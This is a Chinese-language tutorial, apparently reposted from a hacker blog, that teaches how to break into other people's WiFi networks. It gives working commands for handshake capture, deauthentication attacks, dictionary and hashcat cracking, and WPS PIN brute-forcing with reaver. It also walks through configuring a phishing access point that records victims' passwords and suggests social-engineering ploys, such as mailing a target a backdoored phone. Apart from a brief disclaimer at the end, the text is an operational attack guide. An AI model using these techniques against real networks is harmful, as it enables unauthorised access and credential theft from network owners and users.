网络上有各种教大家破解WiFi密码的文章,不乏一些比较优秀的作者,也有像CDLinux、WiFiSlax、wifiway等专业系统。不过对于想全面掌握破解WiFi密码姿势的我们来说,还是需要不停地扒拉,毕竟一篇文章涵盖的内容有限。而本篇文章将要基于树莓派工具箱并综合自己这些年的所有姿势,为大家带来WiFi破解基础技能终结篇。
[转载出处:www.ii77.com]
[本文来自:www.ii77.com]
硬件:树莓派工具箱、手机。
获取密码的姿势:
1、WiFi万能钥匙获取密码
在破解wifi密码之前用wifi万能钥匙扫描一下,如果出现了幸运的蓝色小钥匙,什么都不要说了,这是缘分!当然,并不是所有的小钥匙都代表着可以成功连接,因为它只是记录了这条MAC,这个地点,曾经分享过密码。纵使连不上,我们也可以通过手机 /data/misc/wifi/wpa_supplicant.conf文件 查看钥匙更新的密码组寻找规律(万能钥匙在尝试连接时本地会储存wifi密码,连接失败后更换下一组,最终无法连接时会删除密码,所以查看要及时。)
图示:手机储存的本地密码
2、抓包大法:
抓包过程中要用到Aircrack-ng套件,这里只讲解下本节需要用到的命令。
1) 开启网卡monitor(混杂)模式并杀掉对其有影响的进程。
root@kali:~# airmon-ng start wlan1root@kali:~# airmon-ng check kill
图中wlan1mon就是开启了混杂模式的网卡接口。
2) 捕获数据包并显示获取的wifi列表
root@kali:~# airodump-ng wlan1mon #命令运行一段时间后捕获到足够的数据包可以按ctrl+c中止执行
部分名词解释:
PWR:路由器的信号情况 数值越大信号越强 (-54 > -60) -1通常是获取不到信号强弱信息 Data:捕获的数据包数量,数值越大说明路由器上连接的无线设备越活跃 CH:WiFi频道 ESSID:路由器wifi名字 当名字显示的时候,说明路由器隐藏了SSID STATION:客户端的MAC地址 BSSID:路由器的MAC地址 Probe:可能的WiFi名字(设备曾经连过的WiFi名字) Beacons:数值增加越快 接收到的路由器信号越好
3) 选择目标监听握手包
root@kali:~# airodump-ng --bssid 6C:E8:73:6D:74:AA -c 6 -w 6d74aa wlan1mon #-bssid路由MAC,-c信号频道,-w保存的文件名
在监听过程中很快就会发现路由器连接的客户端(STATION),注意此时ESSID仍然为空。
4) 发送Deauthentication(解除认证)攻击
新建终端运行 root@kali:~# aireplay-ng -0 3 -a 6C:E8:73:6D:74:AA wlan1mon #-0代表所有客户端,3是发送三次,-a是路由器MAC 目的是使路由器连接的客户端掉线,以便抓取客户端和路由器重连过程中的加密认证信息。
回到监听列表即可发现已经抓取到了握手包(右上角WPA handshake:***),此时wifi隐藏的名字也显示了出来。
Ctrl+c 终止监听 , 当前目录里面的6d74aa-01.cap就是抓到的数据包(包含握手包)
Tips:
Beacons快速增加说明信号很强(也可以理解为距离路由器很近)Data快速增加说明终端(连上wifi的设备)很活跃客户端(STATION)MAC后面的PWR越大接收到的终端信号越强在Deauth攻击中可以使用-c指定终端MAC,如果存在多个终端,选择信号最强的那个,攻击效果会更好。本文例子:aireplay-ng -0 -3 -a 6C:E8:73:6D:74:AA -c 50:2B:73:E8:8B:BF wlan1mon天线小知识:网卡天线增益越高,可工作距离越远,对方向要求越严格。信号的发射方向以wifi天线横截面为平面向四周扩散。增益越高,水平面上下扩散角度越窄,发射距离越远。增益越小,水平面上下扩散角度越大,发射距离越近。
5) 暴力破解握手包获取wifi密码
密码能否破解,要看字典里面有没有这个密码,本文为自己搭建的热点,作为演示,构建了一个包含密码的小字典。
root@kali:~# aircrack-ng 6d74aa-01.cap -w /root/pwd/password.txt
在实际环境中,跑包用树莓派你会哭的。通常采用电脑或者交由专业人员处理。
个人跑包建议:
win环境下使用wifipr配合Tirom发布的9.8G字典,家庭电脑一般情况下二十几个小时就可以跑完。
Linux环境下通过以下命令对数据包进行转换,采用hashcat跑包,速度会更快。
root@kali:~# aircrack-ng 6d74aa-01.cap -J 6d74aa.hccaproot@kali:~# hashcat -m 2500 6d74aa.hccap /root/pwd/password.txt #-m 2500是破解wpa/psk模式
3、reaver暴力猜解PIN码
1) 基本知识讲解
wps加密中,终端接入路由器的唯一要求是一个8位数的PIN码,这使得暴力破解变得可行。其次PIN码的最后一位是一个校验和,只要知道前七位就能算出最后一位。这样我们就有了10的7次方个PIN码组合,但实际实施过程中,尝试这一千万种PIN码会花费以年为单位的时间。然而问题总会出现转机,在wps加密身份验证过程中接入点实际上把PIN码分为两部分来验证,前四位,后三位。在PIN码验证失败时接入点会向终端返回EAP-NACK消息,而通过该回应,攻击者能确定PIN码的前半部分或者后半部分是否正确。这样在暴力猜解的时候最多就只需要10^4+10^3=11000个组合,以小时为单位的破解速率,完全足够了。
2) 命令实例
root@kali:~# airmon-ng start wlan1root@kali:~# airmon-ng check -killroot@kali:~# wash -i wlan1monroot@kali:~# reaver -i wlan1mon -b 6C:E8:73:6D:74:AA -s /root/pingsession.txt -vv #-s是保存破解进程到文件
开启wps的路由列表:
reaver破解过程:
破解成功:
需要注意,有些路由器有ping防护,连续收到n个错误的pin码后会暂停n秒,之后才接受新的pin码尝试,当持续收到x个错误PIN码后会休眠n分钟,这些就需要实际测试过程中去发现,然后针对性的添加-d -l 参数使reaver更好的完成工作。
Tips:
新版Reaver集成了pixiewps使用-Z参数即可启用。针对部分有漏洞的芯片几乎可以实现1分钟内出密码。当已破解路由器更改密码后只需要添加-p命令并指定pin码即可秒出密码。本文例子:reaver -i wlan1mon -b 6C:E8:73:6D:74:AA -p 00188302
顺便pixie了一个路由器:
4、伪造钓鱼热点获取WiFi密码
1) 手动配置钓鱼热点,实现用户接入后自动弹出页面,诱导用户输入密码。
修改/etc/dnsmasq.conf------去掉no-pool前面的#号;指定resolv-file=/etc/resolv.conf;增加 address=/.com/10.0.0.1修改hostapd.conf 伪造相同的wifi名字并设置为开放热点。修改/etc/apache2/sites-available/ooo-default.conf------增加 ErrorDocument 404 http://10.0.0.1/tplink/logincheck.html
2) 创建钓鱼页面
根据目标路由器的型号和后台情况创建伪造的钓鱼页面,力求逼真,这样才能最大程度的降低被攻击者的警觉性。本文采用的是普联的路由器,由于附近实在找不到好的素材,就参考着普联官网把前文弹出蒙版的html代码改动了下,凑合着用。
测试截图:
设置完成后重启dnsmasq、hostapd、apache2使修改生效。
3) 攻击路由器促使终端设备持续掉线
root@kali:~# aireplay-ng -0 0 -a 6C:E8:73:6D:74:AA wlan1mon #-0 0代表不停地攻击 也可以使用MDK3攻击 效果会更好
当客户端掉线时,用户会尝试重新连接网络,这时候,有很大的概率会选择我们伪造的热点。手机端接入网络的瞬间就会弹出认证页面,win环境也会弹出认证提示,纵使用户忽略,在打开任意页面的时候也会在浏览器顶部显示此网络需要认证,或者直接跳转到钓鱼页面(http除外,非.com除外)。
我们需要做的就是提前抓取好握手包,并使用tail命令监测密码记录文件的改变,发现新增内容后立即执行以下命令(方向键向上,table补全都很好用)。
root@kali:~# aircrack-ng 6d74aa-01.cap -w /var/www/html/tplink/1og.txt #把密码记录文件当做字典
当验证密码正确后立刻停止攻击,关闭hostapd。
岂不美滋滋~
Tips:
WiFiPhisher 、Fluxion等软件操作起来会更便捷些。修改完钓鱼页面后别忘了运行 chown www-data:www-data -R /var/www/ 将权限赋予apache2,不然很可能无法记录密码(无写入权限)
5、社会工程学攻击获取密码
1) wps按键
能接触到路由器的话先打开手机设置→无线网络→高级设置→使用wps连接
在这之后,保守计算你会有一分半的时间按下路由器wps按键(认证过程会消耗时间)
2) 路由背面标签
很多路由器背面标签会展示PIN码、MAC等信息。
3.) 写在最后
对方的废旧手机、社工库里面的账号密码、包括电脑内储存的密码(HID攻击)等等。甚至某些情况下为了达到目的,可以直接向对方邮寄一台有后门的手机。
知识就是力量,但是拥有力量不代表着可以为所欲为、触犯法律。同样,骑白马的不一定是王子,会开锁的也不一定是小偷。本文只是关于某些技术的实验与验证,只适用于学习。你知道的越多,就能够越好的保护自己。
文章来源:头条号/黑客迷
